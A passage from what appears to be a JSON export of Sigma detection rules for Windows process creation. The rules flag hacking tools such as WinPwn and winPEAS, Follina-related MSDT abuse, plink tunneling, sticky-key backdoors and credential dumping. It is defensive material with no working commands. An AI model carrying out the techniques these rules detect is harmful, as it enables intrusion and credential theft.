"uuid": "056c7317-9a09-4bd4-9067-d051312752ea", "value": "Powershell Executed From Headless ConHost Process" }, { "description": "Detects the execution of whoami that has been renamed to a different name to avoid detection", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-08-12", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_renamed_whoami.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_whoami.yml" ], "tags": [ "attack.discovery", "attack.t1033", "car.2016-03-001" ] }, "related": [ { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f1086bf7-a0c4-4a37-9102-01e573caf4a0", "value": "Renamed Whoami Execution" }, { "description": "Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.\n", "meta": { "author": "Swachchhanda Shrawan Poudel", "creation_date": "2023-12-04", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_winpwn.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/S3cur3Th1sSh1t/WinPwn", "https://www.publicnow.com/view/EB87DB49C654D9B63995FAD4C9DE3D3CC4F6C3ED?1671634841", "https://reconshell.com/winpwn-tool-for-internal-windows-pentesting-and-ad-security/", "https://grep.app/search?q=winpwn&filter[repo][0]=redcanaryco/atomic-red-team", "https://github.com/redcanaryco/atomic-red-team/blob/4d6c4e8e23d465af7a2388620cfe3f8c76e16cf0/atomics/T1082/T1082.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_winpwn.yml" ], "tags": [ "attack.credential-access", "attack.defense-evasion", "attack.discovery", "attack.execution", "attack.privilege-escalation", "attack.t1046", "attack.t1082", "attack.t1106", "attack.t1518", "attack.t1548.002", "attack.t1552.001", "attack.t1555", "attack.t1555.003" ] }, "related": [ { "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e3b6daca-e963-4a69-aee6-ed4fd653ad58", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "837f9164-50af-4ac0-8219-379d8a74cefc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3fc9b85a-2862-4363-a64d-d692e3ffbee0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "58a3e6aa-4453-4cc8-a51f-4befe80b31a8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d557dc06-62e8-4468-a8e8-7984124908ce", "value": "HackTool - WinPwn Execution" }, { "description": "Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts", "meta": { "author": "Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR)", "creation_date": "2019-10-26", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_child_process_as_system_.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/antonioCoco/RogueWinRM", "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", "https://twitter.com/Cyb3rWard0g/status/1453123054243024897", "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_child_process_as_system_.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1134.002" ] }, "related": [ { "dest-uuid": "677569f9-a8b0-459e-ab24-7f18091fa7bf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "590a5f4c-6c8c-4f10-8307-89afe9453a9d", "value": "Suspicious Child Process Created as System" }, { "description": "Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation", "meta": { "author": "Nextron Systems", "creation_date": "2022-06-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_msdt_susp_parent.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/nao_sec/status/1530196847679401984", "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_susp_parent.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036", "attack.t1218" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7a74da6b-ea76-47db-92cc-874ad90df734", "value": "Suspicious MSDT Parent Process" }, { "description": "Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files", "meta": { "author": "frack113", "creation_date": "2022-07-18", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_icacls_deny.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/1df999e6-1cb8-45e3-8b61-499d1b7d5a9b/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_icacls_deny.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.001" ] }, "related": [ { "dest-uuid": "ec8fc7e2-b356-455c-8db5-2e37be158e7d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4ae81040-fc1c-4249-bfa3-938d260214d9", "value": "Use Icacls to Hide File to Everyone" }, { "description": "WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz", "meta": { "author": "Georg Lauenstein (sure[secure])", "creation_date": "2022-09-19", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_winpeas.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation", "https://github.com/carlospolop/PEASS-ng", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_winpeas.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1082", "attack.t1087", "attack.t1046" ] }, "related": [ { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "98b53e78-ebaf-46f8-be06-421aafd176d9", "value": "HackTool - winPEAS Execution" }, { "description": "Detects execution of the Notepad++ updater (gup) to launch other commands or executables", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-10", "falsepositive": [ "Other parent binaries using GUP not currently identified" ], "filename": "proc_creation_win_gup_arbitrary_binary_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/nas_bench/status/1535322445439180803", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gup_arbitrary_binary_execution.yml" ], "tags": [ "attack.execution" ] }, "uuid": "d65aee4d-2292-4cea-b832-83accd6cfa43", "value": "Arbitrary Binary Execution Using GUP Utility" }, { "description": "Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout", "meta": { "author": "frack113", "creation_date": "2022-11-18", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powercfg_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/powercfg-command-line-options", "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powercfg_execution.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "f8d6a15e-4bc8-4c27-8e5d-2b10f0b73e5b", "value": "Suspicious Powercfg Execution To Change Lock Screen Timeout" }, { "description": "Detects attempts of decoding encoded Gzip archives via PowerShell.", "meta": { "author": "Hieu Tran", "creation_date": "2023-03-13", "falsepositive": [ "Legitimate administrative scripts may use this functionality. Use \"ParentImage\" in combination with the script names and allowed users and applications to filter legitimate executions" ], "filename": "proc_creation_win_powershell_decode_gzip.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_decode_gzip.yml" ], "tags": [ "attack.command-and-control", "attack.t1132.001" ] }, "related": [ { "dest-uuid": "04fd5427-79c7-44ea-ae13-11b24778ff1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "98767d61-b2e8-4d71-b661-e36783ee24c1", "value": "Gzip Archive Decode Via PowerShell" }, { "description": "Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-05-19", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_lolbin_susp_grpconv.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/0gtweet/status/1526833181831200770", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_grpconv.yml" ], "tags": [ "attack.persistence", "attack.t1547" ] }, "related": [ { "dest-uuid": "1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f14e169e-9978-4c69-acb3-1cff8200bc36", "value": "Suspicious GrpConv Execution" }, { "description": "Detects execution of a browser process with a URL argument pointing to a file with a potentially interesting extension. This can be abused to download arbitrary files or to hide from the user for example by launching the browser in a minimized state.", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-01-11", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_browsers_inline_file_download.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/mrd0x/status/1478116126005641220", "https://lolbas-project.github.io/lolbas/Binaries/Msedge/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_inline_file_download.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "94771a71-ba41-4b6e-a757-b531372eaab6", "value": "File Download From Browser Process Via Inline URL" }, { "description": "Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-01-11", "falsepositive": [ "Legitimate use by developers as part of NodeJS development with Visual Studio Tools" ], "filename": "proc_creation_win_pressanykey_lolbin_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://gist.github.com/nasbench/a989ce64cefa8081bd50cf6ad8c491b5", "https://twitter.com/mrd0x/status/1463526834918854661", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pressanykey_lolbin_execution.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a20391f8-76fb-437b-abc0-dba2df1952c6", "value": "Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution" }, { "description": "Detects uncommon and potentially suspicious one-liner command containing both \"ping\" and \"copy\" at the same time, which is usually used by malware.\n", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-07-18", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_cmd_ping_copy_combined_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_ping_copy_combined_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.004" ] }, "related": [ { "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ded2b07a-d12f-4284-9b76-653e37b6c8b0", "value": "Potentially Suspicious Ping/Copy Command Combination" }, { "description": "Detects the usage of \"reg.exe\" in order to query reconnaissance information from the registry. Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software.", "meta": { "author": "Timur Zinniatullin, oscd.community", "creation_date": "2019-10-21", "falsepositive": [ "Discord" ], "filename": "proc_creation_win_reg_query_registry.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1012/T1012.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_query_registry.yml" ], "tags": [ "attack.discovery", "attack.t1012", "attack.t1007" ] }, "related": [ { "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "970007b7-ce32-49d0-a4a4-fbef016950bd", "value": "Potential Configuration And Service Reconnaissance Via Reg.EXE" }, { "description": "Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-08-21", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_renamed_adfind.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md", "https://thedfirreport.com/2020/05/08/adfind-recon/", "https://www.joeware.net/freetools/tools/adfind/", "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_adfind.yml" ], "tags": [ "attack.discovery", "attack.t1018", "attack.t1087.002", "attack.t1482", "attack.t1069.002" ] }, "related": [ { "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "21875073-b0ee-49e3-9077-1e2a885359af", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "df55196f-f105-44d3-a675-e9dfb6cc2f2b", "value": "Renamed AdFind Execution" }, { "description": "Detects usage of the SysInternals Procdump utility", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-08-16", "falsepositive": [ "Legitimate use of procdump by a developer or administrator" ], "filename": "proc_creation_win_sysinternals_procdump.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/sysinternals/downloads/procdump", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_procdump.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2e65275c-8288-4ab4-aeb7-6274f58b6b20", "value": "Procdump Execution" }, { "description": "Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility", "meta": { "author": "frack113, Nasreddine Bencherchali", "creation_date": "2022-08-01", "falsepositive": [ "Legitimate import of keys" ], "filename": "proc_creation_win_reg_import_from_suspicious_paths.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/reg-import", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml" ], "tags": [ "attack.t1112", "attack.defense-evasion" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "62e0298b-e994-4189-bc87-bc699aa62d97", "value": "Potential Suspicious Registry File Imported Via Reg.EXE" }, { "description": "Detects the execution of wmic with the \"qfe\" flag in order to obtain information about installed hotfix updates on the system. This is often used by pentester and attacker enumeration scripts", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wmic_recon_hotfix.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html", "https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_hotfix.yml" ], "tags": [ "attack.execution", "attack.t1047" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45", "value": "Windows Hotfix Updates Reconnaissance Via Wmic.EXE" }, { "description": "Execution of plink to perform data exfiltration and tunneling", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-08-04", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_plink_susp_tunneling.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_plink_susp_tunneling.yml" ], "tags": [ "attack.command-and-control", "attack.t1572" ] }, "related": [ { "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f38ce0b9-5e97-4b47-a211-7dc8d8b871da", "value": "Potential RDP Tunneling Via Plink" }, { "description": "Detects the execution of a renamed \"cloudflared\" binary.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-12-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_renamed_cloudflared.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/cloudflare/cloudflared", "https://www.intrinsec.com/akira_ransomware/", "https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/", "https://github.com/cloudflare/cloudflared/releases", "https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_cloudflared.yml" ], "tags": [ "attack.command-and-control", "attack.t1090.001" ] }, "related": [ { "dest-uuid": "f6dacc85-b37d-458e-b58d-74fc4bbf5755", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e0c69ebd-b54f-4aed-8ae3-e3467843f3f0", "value": "Renamed Cloudflared.EXE Execution" }, { "description": "Detects execution of \"AdPlus.exe\", a binary that is part of the Windows SDK that can be used as a LOLBIN in order to dump process memory and execute arbitrary commands.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-09", "falsepositive": [ "Legitimate usage of Adplus for debugging purposes" ], "filename": "proc_creation_win_adplus_memory_dump.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/nas_bench/status/1534916659676422152", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Adplus/", "https://twitter.com/nas_bench/status/1534915321856917506", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_adplus_memory_dump.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2f869d59-7f6a-4931-992c-cce556ff2d53", "value": "Potential Adplus.EXE Abuse" }, { "description": "Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.", "meta": { "author": "frack113", "creation_date": "2022-05-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_lolbin_printbrm.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/PrintBrm/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_printbrm.yml" ], "tags": [ "attack.command-and-control", "attack.t1105", "attack.defense-evasion", "attack.t1564.004" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", "value": "PrintBrm ZIP Creation of Extraction" }, { "description": "Detects usage of Gpg4win to decrypt files", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-09", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_gpg4win_decryption.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/", "https://www.gpg4win.de/documentation.html", "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gpg4win_decryption.yml" ], "tags": [ "attack.execution" ] }, "uuid": "037dcd71-33a8-4392-bb01-293c94663e5a", "value": "File Decryption Using Gpg4win" }, { "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", "meta": { "author": "frack113", "creation_date": "2022-02-11", "falsepositive": [ "Legitimate use" ], "filename": "proc_creation_win_remote_access_tools_logmein.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_logmein.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d85873ef-a0f8-4c48-a53a-6b621f11729d", "value": "Remote Access Tool - LogMeIn Execution" }, { "description": "Detects child processes of the \"Trace log generation tool for Media Foundation Tools\" (Mftrace.exe) which can abused to execute arbitrary binaries.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-09", "falsepositive": [ "Legitimate use for tracing purposes" ], "filename": "proc_creation_win_mftrace_child_process.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mftrace/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mftrace_child_process.yml" ], "tags": [ "attack.defense-evasion", "attack.t1127" ] }, "related": [ { "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3d48c9d3-1aa6-418d-98d3-8fd3c01a564e", "value": "Potential Mftrace.EXE Abuse" }, { "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", "meta": { "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", "creation_date": "2018-03-15", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/archive/blogs/jonathantrull/detecting-sticky-key-backdoors", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml" ], "tags": [ "attack.privilege-escalation", "attack.persistence", "attack.t1546.008", "car.2014-11-003", "car.2014-11-008" ] }, "related": [ { "dest-uuid": "70e52b04-2a0c-4cea-9d18-7149f1df9dc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2fdefcb3-dbda-401e-ae23-f0db027628bc", "value": "Sticky Key Like Backdoor Execution" }, { "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-23", "falsepositive": [ "Other legitimate network providers used and not filtred in this rule" ], "filename": "proc_creation_win_registry_new_network_provider.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/troubleshoot/windows-client/setup-upgrade-and-drivers/network-provider-settings-removed-in-place-upgrade", "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_new_network_provider.yml" ], "tags": [ "attack.credential-access", "attack.t1003" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "baef1ec6-2ca9-47a3-97cc-4cf2bda10b77", "value": "Potential Credential Dumping Attempt Using New NetworkProvider - CLI" }, { "description": "Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain.", "meta": { "author": "@gott_cyber", "creation_date": "2022-07-31", "falsepositive": [ "Legitimate administration use" ], "filename": "proc_creation_win_dnscmd_discovery.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd", "https://learn.microsoft.com/en-us/azure/dns/dns-zones-records", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml" ], "tags": [ "attack.discovery", "attack.execution", "attack.t1543.003" ] }, "related": [ { "dest-uuid": 